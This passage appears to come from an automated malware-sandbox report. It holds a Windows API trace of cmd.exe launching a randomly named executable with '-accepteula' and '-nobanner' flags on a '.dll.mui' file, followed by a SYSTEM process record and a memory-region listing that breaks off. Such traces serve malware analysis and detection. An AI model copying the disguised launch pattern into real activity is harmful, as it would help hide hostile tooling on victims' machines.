RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x6cea84, lpData=0x6cea8c, lpcbData=0x6cea88*=0x1000 | out: lpType=0x6cea84*=0x4, lpData=0x6cea8c*=0x9, lpcbData=0x6cea88*=0x4) returned 0x0 [0221.491] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x6cea84, lpData=0x6cea8c, lpcbData=0x6cea88*=0x1000 | out: lpType=0x6cea84*=0x0, lpData=0x6cea8c*=0x9, lpcbData=0x6cea88*=0x1000) returned 0x2 [0221.491] RegCloseKey (hKey=0x94) returned 0x0 [0221.491] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb43266 [0221.492] srand (_Seed=0x5bb43266) [0221.492] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"jnwdui.dll.mui\" -nobanner" [0221.492] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"jnwdui.dll.mui\" -nobanner" [0221.492] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0221.492] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x777f68, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0221.492] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0221.492] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0221.492] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0221.492] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.492] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0221.492] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0221.492] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0221.492] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0221.492] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0221.492] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0221.492] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0221.492] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0221.492] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0221.492] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x6cf858 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0221.492] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x6cf858, lpFilePart=0x6cf850 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x6cf850*="Desktop") returned 0x1d [0221.492] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0221.971] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x6cf5d8 | out: lpFindFileData=0x6cf5d8) returned 0x778178 [0221.971] FindClose (in: hFindFile=0x778178 | out: hFindFile=0x778178) returned 1 [0221.971] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x6cf5d8 | out: lpFindFileData=0x6cf5d8) returned 0x778178 [0221.971] FindClose (in: hFindFile=0x778178 | out: hFindFile=0x778178) returned 1 [0221.971] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0221.971] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x6cf5d8 | out: lpFindFileData=0x6cf5d8) returned 0x778178 [0221.971] FindClose (in: hFindFile=0x778178 | out: hFindFile=0x778178) returned 1 [0221.972] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0221.972] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0221.972] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0221.972] GetEnvironmentStringsW () returned 0x77a0a8* [0221.972] FreeEnvironmentStringsA (penv="=") returned 1 [0221.972] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0221.972] GetConsoleOutputCP () returned 0x1b5 [0221.974] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0221.974] GetUserDefaultLCID () returned 0x409 [0221.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0221.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x6cf988, cchData=128 | out: lpLCData="0") returned 2 [0221.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x6cf988, cchData=128 | out: lpLCData="0") returned 2 [0221.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x6cf988, cchData=128 | out: lpLCData="1") returned 2 [0221.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0221.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0221.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0221.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0221.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0221.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0221.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0221.975] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0221.975] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0221.975] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0221.975] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0221.976] GetConsoleTitleW (in: lpConsoleTitle=0x778d10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.976] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0221.976] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0221.976] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0221.976] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0221.977] _wcsicmp (_String1="vIDhS3md.exe", _String2=")") returned 77 [0221.977] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0221.977] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0221.977] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0221.977] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0221.977] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0221.977] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0221.978] GetConsoleTitleW (in: lpConsoleTitle=0x6cf670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.980] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0221.980] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0221.981] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0221.982] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0221.982] SetErrorMode (uMode=0x0) returned 0x0 [0221.982] SetErrorMode (uMode=0x1) returned 0x0 [0221.982] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x77b0b8, lpFilePart=0x6cf17c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x6cf17c*="Desktop") returned 0x1d [0221.982] SetErrorMode (uMode=0x0) returned 0x1 [0221.982] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0221.982] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0221.986] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0221.987] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0221.987] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0x6cef28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cef28) returned 0x779410 [0221.987] FindClose (in: hFindFile=0x779410 | out: hFindFile=0x779410) returned 1 [0221.987] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0221.987] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0221.987] GetConsoleTitleW (in: lpConsoleTitle=0x6cf3fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.988] InitializeProcThreadAttributeList (in: lpAttributeList=0x6cf328, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x6cf30c | out: lpAttributeList=0x6cf328, lpSize=0x6cf30c) returned 1 [0221.988] UpdateProcThreadAttribute (in: lpAttributeList=0x6cf328, dwFlags=0x0, Attribute=0x60001, lpValue=0x6cf314, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x6cf328, lpPreviousValue=0x0) returned 1 [0221.988] GetStartupInfoW (in: lpStartupInfo=0x6cf360 | out: lpStartupInfo=0x6cf360*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x38, hStdOutput=0xc0, hStdError=0x40)) [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"jnw", _MaxCount=0x7) returned -3 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0221.988] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0221.989] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0221.989] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0221.990] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula \"jnwdui.dll.mui\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x6cf2b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"jnwdui.dll.mui\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x6cf2fc | out: lpCommandLine="vIDhS3md.exe -accepteula \"jnwdui.dll.mui\" -nobanner", lpProcessInformation=0x6cf2fc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xed4, dwThreadId=0xec8)) returned 1 [0259.124] CloseHandle (hObject=0xa4) returned 1 [0259.124] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0259.124] GetEnvironmentStringsW () returned 0x778178* [0259.124] FreeEnvironmentStringsA (penv="=") returned 1 [0259.124] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0266.101] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x6cf294 | out: lpExitCode=0x6cf294*=0x1) returned 1 [0266.102] CloseHandle (hObject=0xa8) returned 1 [0266.102] _vsnwprintf (in: _Buffer=0x6cf37c, _BufferCount=0x13, _Format="%08X", _ArgList=0x6cf29c | out: _Buffer="00000001") returned 8 [0266.102] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0266.102] GetEnvironmentStringsW () returned 0x778178* [0266.102] FreeEnvironmentStringsA (penv="=") returned 1 [0266.102] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0266.102] GetEnvironmentStringsW () returned 0x778178* [0266.102] FreeEnvironmentStringsA (penv="=") returned 1 [0266.102] DeleteProcThreadAttributeList (in: lpAttributeList=0x6cf328 | out: lpAttributeList=0x6cf328) [0266.102] _get_osfhandle (_FileHandle=1) returned 0xc0 [0266.102] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0266.102] _get_osfhandle (_FileHandle=1) returned 0xc0 [0266.102] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0266.102] _get_osfhandle (_FileHandle=0) returned 0x38 [0266.102] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0266.119] SetConsoleInputExeNameW () returned 0x1 [0266.119] GetConsoleOutputCP () returned 0x1b5 [0266.199] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0266.199] SetThreadUILanguage (LangId=0x0) returned 0x409 [0266.564] exit (_Code=1) Thread: id = 312 os_tid = 0xec0 Process: id = "31" image_name = "System" filename = "" page_root = "0x1aa000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "26" os_parent_pid = "0xa54" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 2086 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2087 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2088 start_va = 0x280000000 end_va = 0x280000fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000280000000" filename = "" Region: id = 2089 start_va = 0x280010000 end_va = 0x280010fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000280010000" filename = "" Region: id = 2090 start_va = 0x280020000 end_va = 0x280020fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000280020000" filename = "" Region: id = 2091 start_va = 0x280030000 end_va = 0x28004ffff entry_point = 0x0 region_type = private name = "private_0x0000000280030000" filename = "" Region: id = 2092 start_va = 0x280050000 end_va = 0x28006ffff entry_point = 0x0 region_type = private name = "private_0x0000000280050000" filename = "" Region: id = 2093 start_va = 0x280070000 end_va = 0x28008ffff entry_point = 0x0 region_type = private name = "private_0x0000000280070000" filename = "" Region: id = 2094 start_va = 0x280090000 end_va = 0x2800affff entry_point = 0x0 region_type = private name = "private_0x0000000280090000" filename = "" Region: id = 2095 start_va = 0x2800b0000 end_va = 0x2800cffff entry_point = 0x0 region_type = private name = "private_0x00000002800b0000" filename = "" Region: id = 2096 start_va = 0x2800d0000 end_va = 0x2800effff entry_point = 0x0 region_type = private name = "private_0x00000002800d0000" filename = "" Region: id = 2097 start_va = 0x2800f0000 end_va = 0x28010ffff entry_point = 0x0 region_type = private name = "private_0x00000002800f0000" filename = "" Region: id = 2098 start_va = 0x280110000 end_va = 0x28012ffff entry_point = 0x0 region_type = private name = "private_0x0000000280110000" filename = "" Region: id = 2099 start_va = 0x280130000 end_va = 0x28014ffff entry_point = 0x0 region_type = private name = "private_0x0000000280130000" filename = "" Region: id = 2100 start_va = 0x280150000 end_va = 0x28016ffff entry_point = 0x0 region_type = private name = "private_0x0000000280150000" filename = "" Region: id = 2101 start_va = 0x280170000 end_va = 0x28018ffff entry_point = 